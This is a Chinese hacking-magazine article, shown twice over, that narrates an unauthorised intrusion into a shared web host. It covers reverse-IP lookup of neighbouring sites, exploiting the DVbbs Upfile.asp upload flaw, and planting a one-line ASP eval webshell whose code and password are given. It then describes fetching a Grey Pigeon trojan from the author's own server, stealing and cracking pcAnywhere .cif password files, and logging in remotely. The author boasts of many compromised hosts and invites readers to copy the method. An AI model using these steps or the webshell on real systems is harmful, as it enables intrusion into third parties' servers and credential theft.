文章来源:安全中国

前段时间动网的Upfile.asp文件上传漏洞闹地沸沸扬扬，很多朋友可能利用这个漏洞得到了不少WebShell，我也利用它搞到了很多的WebShell，可是由于事情比较多，没能对已经放置了WebShell的虚拟主机进一步深入，现在空了，赶紧拿出了以前放置的WebShell……

TIPS：动网的Upfile.asp文件上传漏洞可以上传任何文件至服务器。凶器是ASP木马（如海阳顶端网ASP木马，冰河浪子微型ASP木马等），利用上传漏洞上传这些小巧而功能强大的ASP木马来入侵服务器。由于ASP是一种动态网页解析技术，加上黑客往往会破坏数据库造成整个论坛瘫痪、数据丢失，事后，要查出入侵者的IP也是非常麻烦的事。黑防前几期已经有非常详细的介绍，大家可以翻看以往的杂志。

我的这些肉鸡列表中，就数www.***.com网站最大，浏览量最高，要搞就搞大的。可惜这个网站的WebShell早已经被发现并删除了，我来看看有别的方法进去没有。
在网站上转了几圈，发现该网站的动网论坛已经由低版本升级到了最新的7.0 sp2，彻底杜绝了上传漏洞，而且这个网站的整站程序是由后台动态页面产生前台静态HTML页面，根本没有SQL注射的机会，转来转去还是一无所获！拿起扫描器，对这台主机进行了一番扫描，结果就发现了几个常见端口，几乎没有利用的可能。徘徊了好长时间，我还是别死钻牛角，想点别的办法来入侵吧！
既然正面来不行，那我就拐弯搞一次。据我估计，这个网站所在的主机一定是台虚拟主机，提供WEB空间出售，其中肯定还有别的网站，而这些网站十有八九存在当前最热门的动网论坛，嘿嘿！如果存在动网论坛是7.0 sp2以下的版本，那么就可以上传ASP木马，然后……越想越带劲，抓紧时间干。

TIPS：2004年第八期黑防上开始出现以“旁注”为内容的文章，实际上就是利用虚拟主机的特点，先利用注入漏洞入侵同一服务器上目标站点“旁边”的主机，然后再迂回攻击目标，这样的入侵路在最近的网络攻击事件中非常盛行。

步骤1：探测虚拟主机中的其它网站
要探测虚拟主机中的其它网站，在有些朋友看来好象有点不可能。其实只要借助这个网站：http://whois.webhosting.info就可以了！它是一家提供高级WHOIS服务的网站，可以对域名，IP等进行WHOIS查询，从而发现其中的大量信息。

TIPS：WHOIS服务是查询目标IP上有多少个域名指向，并且能查出这些域名的详细注册信息。这里给大家推荐一款小工具，非常方便而且整合了很多相关功能：桂林老兵网络信息综合查询工具，本期光盘有收录，大家可以试试它的功能。

我来对目标主机http://www.xx.com进行探测一下，在“Enter a domain name or an IP Address in the search box below:”中填写地址：http://www.***.com再查询，可以看到查到了这个主机上存在75个域名开放的情况（如图1所示），呵呵！看来这个空间主机还赚了不少钱呢！
 

打开这75个域名进行浏览，果然发现其中一个网站www.yyy.com存在一个低版本的动网论坛，这下好办了，开始上传ASP木马！

步骤2：上传ASP木马
动网文件上传漏洞的相关工具非常多，我这里用浪客联盟的工具：DVbbs Exploit。在URL中填写上传文件的具体URL地址：www.yyy.com/bbs/upfile.asp,上传路径中填写“data（即保存论坛数据库的文件夹）”，在文件名填写1.asp，然后在木马内容中复制冰狐浪子网页木马的内容：<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(’heidan’)+’’)</SCRIPT>，注意：“heidan”是我设置的连接密码，如图2所示。
 

上传成功后，得到的木马地址是：www.yyy.com/bbs/data/1.asp.
步骤三，系统探测
已经成功上传了冰狐浪子网页后门，那么来探测一下这台主机的基本情况吧！打开控制页面Icyfox007.htm，填写木马地址www.yyy.com/bbs/data/1.asp.和密码“heidan”进行简单的探测。发现该主机存在5个盘，D盘存在客户网站资料，已经被NTFS严格限制权限，无法浏览。而F盘是系统盘，由于管理员不太重视，所以ASP后门对它有写，读等权限！那我就不客气了，向虚拟主机的主机权限进发！
我配置了一个灰鸽子服务器端Server.exe，上传到我的网站http://zzz.com下，得到下载地址Http://zzz.com/server.exe，下面来把它上传到主机上。使用冰狐浪子网页后门的上传文件功能，在“Input URL”中填写木马的下载地址http://zzz.com/server.exe，在“Input Path”中填写本地生成的具体路径名：c:\1.exe，提示上传功能！再利用冰狐浪子网页后门的运行程序功能，在“Input Path”中填写木马的路径c:\，在“Input Name”中填写木马名1.exe，然后运行！等了好长一会时间，提示：运行失败！没看错吧？我又尝试运行了几次，都是提示运行失败！
没办法，换个后门试试，又尝试上传了几个别的后门程序，结果都提示运行失败，看来十有八九这台主机安装了非常厉害的杀毒软件。经过后门的“环境探测”，证实了我的猜想，果然在F盘下发现了KV2003的字眼，难怪！
但是同时也验证了那句老话：山穷水尽疑无路，柳暗花明又一村。因为我同时看见在KV2003旁边出现了字眼：f:\ Program Files\Symantec\pcAnywhere（如图3所示），这是远程管理软件PcAnywhere的安装路径。只要把PcAnywhere的密码文件得到，进行破解，那么就可以顺利的拿下这台主机了！


步骤4：下载密码文件并破解
PcAnywhere的密码文件是以“cif”结尾的，通常保存在f:\Program Files\Symantec\pcAnywhere下。但这样不太好找，有个小诀窍，只要进入到f:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\下，即可轻松发现密码文件。我利用冰狐浪子网页后门的“浏览目录”功能进入到其路径下，果然发现了“cif”密码文件，再利用冰狐浪子网页后门的下载功能，顺利将其下载到本地文件夹中（如图4所示）。幸亏管理员设置的系统F盘可操作，否则这次提升权限的操作可就失败了。

破解Pcanywhere密码的工具非常多，例如PcAnyWhereCrack，PcanywherePWD等等，我比较喜欢PcanywherePWD，图形化界面，很容易上手。打开PcanywherePWD，选择下载到的密码文件，点“解密”，即可得到Pcanywhere的用户名和密码，如图5所示。

TIPS：PcAnyWhere是首屈一指的远程遥控软件，安全性高、操作更简易且可自订符合需要的规格。但它的帐户信息是存储在cif或者chf文件中的，拿到文件就能破解它的密码——不过11.0版以上的PcAnyWhere已经解决了这个问题，使用现有的密码破解工具是不能读出密码的。

步骤5：连接主机
在网上下载了Pcanywhere，安装完毕，添加被控主机，在工具拦中选择“主控端”，再选择其中的“添加主控端”，打开设置面板，在“连接信息”标签中选择“TCP/IP”，在“设置”标签下的填写目标主机IP地址，设置完毕！双击添加成功的控制端进行连接！连接上后，提示输入密码和用户，填写已经破解到的密码和用户名，顺利进入主机！

至此，一次拐弯入侵虚拟主机的过程结束，这次过程主要是利用了http://whois.webhosting.info对主机的域名探测，然后使用了Pcanywhere的破解程序，最后获得权限。关键是WHOIS查询发挥出了大作用，大家在入侵的过程中也可以考虑使用它哦！

前段时间动网的Upfile.asp文件上传漏洞闹地沸沸扬扬，很多朋友可能利用这个漏洞得到了不少WebShell，我也利用它搞到了很多的WebShell，可是由于事情比较多，没能对已经放置了WebShell的虚拟主机进一步深入，现在空了，赶紧拿出了以前放置的WebShell……

TIPS：动网的Upfile.asp文件上传漏洞可以上传任何文件至服务器。凶器是ASP木马（如海阳顶端网ASP木马，冰河浪子微型ASP木马等），利用上传漏洞上传这些小巧而功能强大的ASP木马来入侵服务器。由于ASP是一种动态网页解析技术，加上黑客往往会破坏数据库造成整个论坛瘫痪、数据丢失，事后，要查出入侵者的IP也是非常麻烦的事。黑防前几期已经有非常详细的介绍，大家可以翻看以往的杂志。

我的这些肉鸡列表中，就数www.***.com网站最大，浏览量最高，要搞就搞大的。可惜这个网站的WebShell早已经被发现并删除了，我来看看有别的方法进去没有。
在网站上转了几圈，发现该网站的动网论坛已经由低版本升级到了最新的7.0 sp2，彻底杜绝了上传漏洞，而且这个网站的整站程序是由后台动态页面产生前台静态HTML页面，根本没有SQL注射的机会，转来转去还是一无所获！拿起扫描器，对这台主机进行了一番扫描，结果就发现了几个常见端口，几乎没有利用的可能。徘徊了好长时间，我还是别死钻牛角，想点别的办法来入侵吧！
既然正面来不行，那我就拐弯搞一次。据我估计，这个网站所在的主机一定是台虚拟主机，提供WEB空间出售，其中肯定还有别的网站，而这些网站十有八九存在当前最热门的动网论坛，嘿嘿！如果存在动网论坛是7.0 sp2以下的版本，那么就可以上传ASP木马，然后……越想越带劲，抓紧时间干。

TIPS：2004年第八期黑防上开始出现以“旁注”为内容的文章，实际上就是利用虚拟主机的特点，先利用注入漏洞入侵同一服务器上目标站点“旁边”的主机，然后再迂回攻击目标，这样的入侵路在最近的网络攻击事件中非常盛行。

步骤1：探测虚拟主机中的其它网站
要探测虚拟主机中的其它网站，在有些朋友看来好象有点不可能。其实只要借助这个网站：http://whois.webhosting.info就可以了！它是一家提供高级WHOIS服务的网站，可以对域名，IP等进行WHOIS查询，从而发现其中的大量信息。

TIPS：WHOIS服务是查询目标IP上有多少个域名指向，并且能查出这些域名的详细注册信息。这里给大家推荐一款小工具，非常方便而且整合了很多相关功能：桂林老兵网络信息综合查询工具，本期光盘有收录，大家可以试试它的功能。

我来对目标主机http://www.xx.com进行探测一下，在“Enter a domain name or an IP Address in the search box below:”中填写地址：http://www.***.com再查询，可以看到查到了这个主机上存在75个域名开放的情况（如图1所示），呵呵！看来这个空间主机还赚了不少钱呢！
 

打开这75个域名进行浏览，果然发现其中一个网站www.yyy.com存在一个低版本的动网论坛，这下好办了，开始上传ASP木马！

步骤2：上传ASP木马
动网文件上传漏洞的相关工具非常多，我这里用浪客联盟的工具：DVbbs Exploit。在URL中填写上传文件的具体URL地址：www.yyy.com/bbs/upfile.asp,上传路径中填写“data（即保存论坛数据库的文件夹）”，在文件名填写1.asp，然后在木马内容中复制冰狐浪子网页木马的内容：<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(’heidan’)+’’)</SCRIPT>，注意：“heidan”是我设置的连接密码，如图2所示。
 

上传成功后，得到的木马地址是：www.yyy.com/bbs/data/1.asp.
步骤三，系统探测
已经成功上传了冰狐浪子网页后门，那么来探测一下这台主机的基本情况吧！打开控制页面Icyfox007.htm，填写木马地址www.yyy.com/bbs/data/1.asp.和密码“heidan”进行简单的探测。发现该主机存在5个盘，D盘存在客户网站资料，已经被NTFS严格限制权限，无法浏览。而F盘是系统盘，由于管理员不太重视，所以ASP后门对它有写，读等权限！那我就不客气了，向虚拟主机的主机权限进发！
我配置了一个灰鸽子服务器端Server.exe，上传到我的网站http://zzz.com下，得到下载地址Http://zzz.com/server.exe，下面来把它上传到主机上。使用冰狐浪子网页后门的上传文件功能，在“Input URL”中填写木马的下载地址http://zzz.com/server.exe，在“Input Path”中填写本地生成的具体路径名：c:\1.exe，提示上传功能！再利用冰狐浪子网页后门的运行程序功能，在“Input Path”中填写木马的路径c:\，在“Input Name”中填写木马名1.exe，然后运行！等了好长一会时间，提示：运行失败！没看错吧？我又尝试运行了几次，都是提示运行失败！
没办法，换个后门试试，又尝试上传了几个别的后门程序，结果都提示运行失败，看来十有八九这台主机安装了非常厉害的杀毒软件。经过后门的“环境探测”，证实了我的猜想，果然在F盘下发现了KV2003的字眼，难怪！
但是同时也验证了那句老话：山穷水尽疑无路，柳暗花明又一村。因为我同时看见在KV2003旁边出现了字眼：f:\ Program Files\Symantec\pcAnywhere（如图3所示），这是远程管理软件PcAnywhere的安装路径。只要把PcAnywhere的密码文件得到，进行破解，那么就可以顺利的拿下这台主机了！


步骤4：下载密码文件并破解
PcAnywhere的密码文件是以“cif”结尾的，通常保存在f:\Program Files\Symantec\pcAnywhere下。但这样不太好找，有个小诀窍，只要进入到f:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\下，即可轻松发现密码文件。我利用冰狐浪子网页后门的“浏览目录”功能进入到其路径下，果然发现了“cif”密码文件，再利用冰狐浪子网页后门的下载功能，顺利将其下载到本地文件夹中（如图4所示）。幸亏管理员设置的系统F盘可操作，否则这次提升权限的操作可就失败了。

破解Pcanywhere密码的工具非常多，例如PcAnyWhereCrack，PcanywherePWD等等，我比较喜欢PcanywherePWD，图形化界面，很容易上手。打开PcanywherePWD，选择下载到的密码文件，点“解密”，即可得到Pcanywhere的用户名和密码，如图5所示。

TIPS：PcAnyWhere是首屈一指的远程遥控软件，安全性高、操作更简易且可自订符合需要的规格。但它的帐户信息是存储在cif或者chf文件中的，拿到文件就能破解它的密码——不过11.0版以上的PcAnyWhere已经解决了这个问题，使用现有的密码破解工具是不能读出密码的。

步骤5：连接主机
在网上下载了Pcanywhere，安装完毕，添加被控主机，在工具拦中选择“主控端”，再选择其中的“添加主控端”，打开设置面板，在“连接信息”标签中选择“TCP/IP”，在“设置”标签下的填写目标主机IP地址，设置完毕！双击添加成功的控制端进行连接！连接上后，提示输入密码和用户，填写已经破解到的密码和用户名，顺利进入主机！

至此，一次拐弯入侵虚拟主机的过程结束，这次过程主要是利用了http://whois.webhosting.info对主机的域名探测，然后使用了Pcanywhere的破解程序，最后获得权限。关键是WHOIS查询发挥出了大作用，大家在入侵的过程中也可以考虑使用它哦！